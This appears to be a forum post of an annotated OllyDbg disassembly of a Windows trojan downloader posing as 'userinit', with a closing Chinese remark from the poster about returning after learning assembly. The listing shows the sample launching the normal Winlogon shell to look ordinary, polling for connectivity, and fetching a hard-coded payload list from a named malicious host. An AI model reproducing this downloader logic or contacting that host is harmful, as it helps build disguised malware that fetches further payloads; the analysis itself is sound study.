CODE:
; ---------------------------------------------------------------------------
; userinit.0040045A — main routine of the analysed sample (OllyDbg listing,
; x86-32, stdcall Win32 API calls; the module calls itself "userinit").
; Frame (ebp-relative): [ebp-4] = hKey; [ebp-8] = DWORD used first as cbData for
; RegQueryValueExA and later as the out-flags of InternetGetConnectedState;
; [ebp-10C] = 0x104-byte (MAX_PATH) string buffer; [ebp-110] = hFile.
; Behaviour visible in this excerpt:
;   1. LoadLibraryA("user32.dll") / GetProcAddress("loadremotefonts") / call it
;      (presumably mimicking the genuine userinit.exe start-up — TODO confirm).
;   2. Read HKLM\software\microsoft\windows nt\currentversion\winlogon "shell"
;      and pass it to sub 00400230 (annotated CreateProcessA), so the normal
;      shell is still started and logon looks ordinary (inferred).
;   3. Poll InternetGetConnectedState once per second until the host is online.
;   4. GetTempFileNameA in "." and call sub 00400275 with the hard-coded URL
;      http://2.joppnqq.com/test.cer (analyst note: downloads a list of further
;      payloads); then open the downloaded file and check its size.
; Defender notes: the URL/host above and a temp file created in the process's
; working directory are the observable indicators in this excerpt; how the
; sample gets launched (e.g. via the Winlogon Userinit value) is not shown here.
; The listing between 0040059D and 00400676 is elided ("....").
; ---------------------------------------------------------------------------
0040045A > $ 55 push ebp ; (initial cpu selection) [original note, unrelated here] — prologue: save caller's frame
0040045B . 8BEC mov ebp,esp ; frame pointer
0040045D . 81C4 E8FEFFFF add esp,-118 ; 0x118 bytes of locals (see frame layout above)
00400463 . 68 9C0A4000 push userinit.00400A9C ; /user32.dll — lpLibFileName
00400468 . E8 55020000 call <jmp.&kernel32.LoadLibraryA> ; \LoadLibraryA
0040046D . 0BC0 or eax,eax ; hModule == NULL?
0040046F . 74 11 je short userinit.00400482 ; user32 not loaded -> skip the LoadRemoteFonts call
00400471 . 68 A70A4000 push userinit.00400AA7 ; /loadremotefonts — lpProcName (shown lower-case; GetProcAddress is case-sensitive, so this is probably a display artifact of the listing — TODO confirm against the sample's strings)
00400476 . 50 push eax ; |hModule
00400477 . E8 34020000 call <jmp.&kernel32.GetProcAddress> ; \GetProcAddress
0040047C . 0BC0 or eax,eax ; export not found?
0040047E . 74 02 je short userinit.00400482 ; not found -> skip
00400480 . FFD0 call eax ; USER32.LoadRemoteFonts (eax resolved by OllyDbg at run time)
00400482 > 8D45 FC lea eax,dword ptr ss:[ebp-4] ; &hKey
00400485 . 50 push eax ; /pHandle = &hKey
00400486 . 68 19000200 push 20019 ; |Access = KEY_READ
0040048B . 6A 00 push 0 ; |Reserved = 0
0040048D . 68 B70A4000 push userinit.00400AB7 ; |software\microsoft\windows nt\currentversion\winlogon — lpSubKey
00400492 . 68 02000080 push 80000002 ; |hKey = HKEY_LOCAL_MACHINE
00400497 . E8 5C020000 call <jmp.&advapi32.RegOpenKeyExA> ; \RegOpenKeyExA
0040049C . 0BC0 or eax,eax //ERROR_SUCCESS (0)? — opens the Winlogon key to read its Shell value
0040049E . 75 48 jnz short userinit.004004E8 ; open failed -> skip straight to the connectivity loop
004004A0 . C745 F8 04010000 mov dword ptr ss:[ebp-8],104 ; cbData = 0x104 (260.) for RegQueryValueExA
004004A7 . 68 04010000 push 104 ; /Length = 104 (260.)
004004AC . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; | &buf
004004B2 . 50 push eax ; |Destination = buf
004004B3 . E8 16020000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory — clear the string buffer
004004B8 . 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; &cbData
004004BB . 50 push eax ; /pBufSize = &cbData
004004BC . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; | &buf
004004C2 . 50 push eax ; |Buffer = buf
004004C3 . 6A 00 push 0 ; |pValueType = NULL
004004C5 . 6A 00 push 0 ; |Reserved = NULL
004004C7 . 68 960A4000 push userinit.00400A96 ; |shell — lpValueName
004004CC . FF75 FC push dword ptr ss:[ebp-4] ; |hKey
004004CF . E8 2A020000 call <jmp.&advapi32.RegQueryValueExA> ; \RegQueryValueExA — return value is NOT checked: on failure buf stays all-zero and an empty string reaches 00400230
004004D4 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; &buf (the Shell string)
004004DA . 50 push eax ; /Arg1 = Shell string
004004DB . E8 50FDFFFF call userinit.00400230 ; \userinit.00400230 CreateProcessA — analyst annotation: launches the Shell value (normally the logon shell) so the logon continues as usual
004004E0 . FF75 FC push dword ptr ss:[ebp-4] ; /hKey
004004E3 . E8 0A020000 call <jmp.&advapi32.RegCloseKey> ; \RegCloseKey
004004E8 > 68 E8030000 push 3E8 ; /Timeout = 1000. ms — head of the connectivity poll loop
004004ED . E8 E8010000 call <jmp.&kernel32.Sleep> ; \Sleep
004004F2 . 6A 00 push 0 ; /dwReserved = 0
004004F4 . 8D45 F8 lea eax,dword ptr ss:[ebp-8] ; | &flags ([ebp-8] reused as the out parameter)
004004F7 . 50 push eax ; |lpdwFlags = &flags
004004F8 . E8 13020000 call <jmp.&wininet.InternetGetConnectedState> ; \InternetGetConnectedState — is the machine online?
004004FD . 0BC0 or eax,eax ; FALSE (offline)?
004004FF . 75 02 jnz short userinit.00400503 ; online -> proceed to the download
00400501 .^ EB E5 jmp short userinit.004004E8 ; offline -> sleep 1 s and poll again (no upper bound)
00400503 > 68 04010000 push 104 ; /Length = 104 (260.)
00400508 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; | &buf
0040050E . 50 push eax ; |Destination = buf
0040050F . E8 BA010000 call <jmp.&kernel32.RtlZeroMemory> ; \RtlZeroMemory — clear buf before reuse as a path
00400514 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; &buf
0040051A . 50 push eax ; /TempName = buf (receives the generated path)
0040051B . 6A 00 push 0 ; |Unique = 0 -> the API itself creates the file
0040051D . 6A 00 push 0 ; |Prefix = NULL
0040051F . 68 940A4000 push userinit.00400A94 ; |. — lpPathName: the process's current working directory
00400524 . E8 93010000 call <jmp.&kernel32.GetTempFileNameA> ; \GetTempFileNameA — temp file that receives the download (original note: "generates the file name for the downloaded virus list")
00400529 > 68 E8030000 push 3E8 ; /Timeout = 1000. ms
0040052E . E8 A7010000 call <jmp.&kernel32.Sleep> ; \Sleep
00400533 . 68 88130000 push 1388 ; /Arg3 = 00001388 (5000.) — meaning not visible here; presumably a timeout or size limit — TODO confirm in 00400275
00400538 . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; | &buf
0040053E . 50 push eax ; |Arg2 = temp file path
0040053F . 68 ED0A4000 push userinit.00400AED ; |http://2.joppnqq.com/test.cer — hard-coded download URL (network indicator: host 2.joppnqq.com); original note: "virus list"
00400544 . E8 2CFDFFFF call userinit.00400275 ; \userinit.00400275 — analyst note: downloads the URL into Arg2 and reads it as a list of further payloads to fetch (body not in this excerpt)
00400549 . 0BC0 or eax,eax ; returned 0?
0040054B . 0F84 17010000 je userinit.00400668 ; download failed -> 00400668 (outside this excerpt)
00400551 . C705 900A4000 00000000 mov dword ptr ds:[400A90],0 ; global dword at 400A90 reset to 0 (role not visible here — presumably a counter/index over the list)
0040055B . 6A 00 push 0 ; /hTemplateFile = NULL
0040055D . 6A 00 push 0 ; |Attributes = 0
0040055F . 6A 03 push 3 ; |Mode = OPEN_EXISTING
00400561 . 6A 00 push 0 ; |pSecurity = NULL
00400563 . 6A 00 push 0 ; |ShareMode = 0
00400565 . 68 00000080 push 80000000 ; |Access = GENERIC_READ
0040056A . 8D85 F4FEFFFF lea eax,dword ptr ss:[ebp-10C] ; | &buf (temp file path)
00400570 . 50 push eax ; |FileName = buf
00400571 . E8 16010000 call <jmp.&kernel32.CreateFileA> ; \CreateFileA — open the downloaded file read-only
00400576 . 83F8 FF cmp eax,-1 ; INVALID_HANDLE_VALUE?
00400579 . 0F84 E2000000 je userinit.00400661 ; open failed -> 00400661 (outside this excerpt)
0040057F . 8985 F0FEFFFF mov dword ptr ss:[ebp-110],eax ; hFile
00400585 . 6A 00 push 0 ; /pFileSizeHigh = NULL
00400587 . FFB5 F0FEFFFF push dword ptr ss:[ebp-110] ; |hFile
0040058D . E8 18010000 call <jmp.&kernel32.GetFileSize> ; \GetFileSize
00400592 . 83F8 0F cmp eax,0F ; size < 15 bytes?
00400595 . 73 0D jnb short userinit.004005A4 ; size >= 0xF -> go process the file. NOTE: GetFileSize returns 0xFFFFFFFF on error, which also takes this branch (unsigned jnb), so an I/O error is treated as a large file
00400597 . FFB5 F0FEFFFF push dword ptr ss:[ebp-110] ; /hObject = hFile — file too small: close it (continuation elided)
0040059D . E8 E4000000 call <jmp.&kernel32.CloseHandle> ; \CloseHandle
......................................................................................................................
00400676 . 6A 64 push 64 ; /Timeout = 100. ms
00400678 . E8 5D000000 call <jmp.&kernel32.Sleep> ; \Sleep
0040067D .^ EB EE jmp short userinit.0040066D ; back to the loop head at 0040066D (outside this excerpt)
0040067F > 6A 00 push 0 ; /ExitCode = 0
00400681 . E8 1E000000 call <jmp.&kernel32.ExitProcess> ; \ExitProcess — end of the routine
等学好了汇编我再来看.这个先放在这里,到时候我相信肯定收获不小,嘿嘿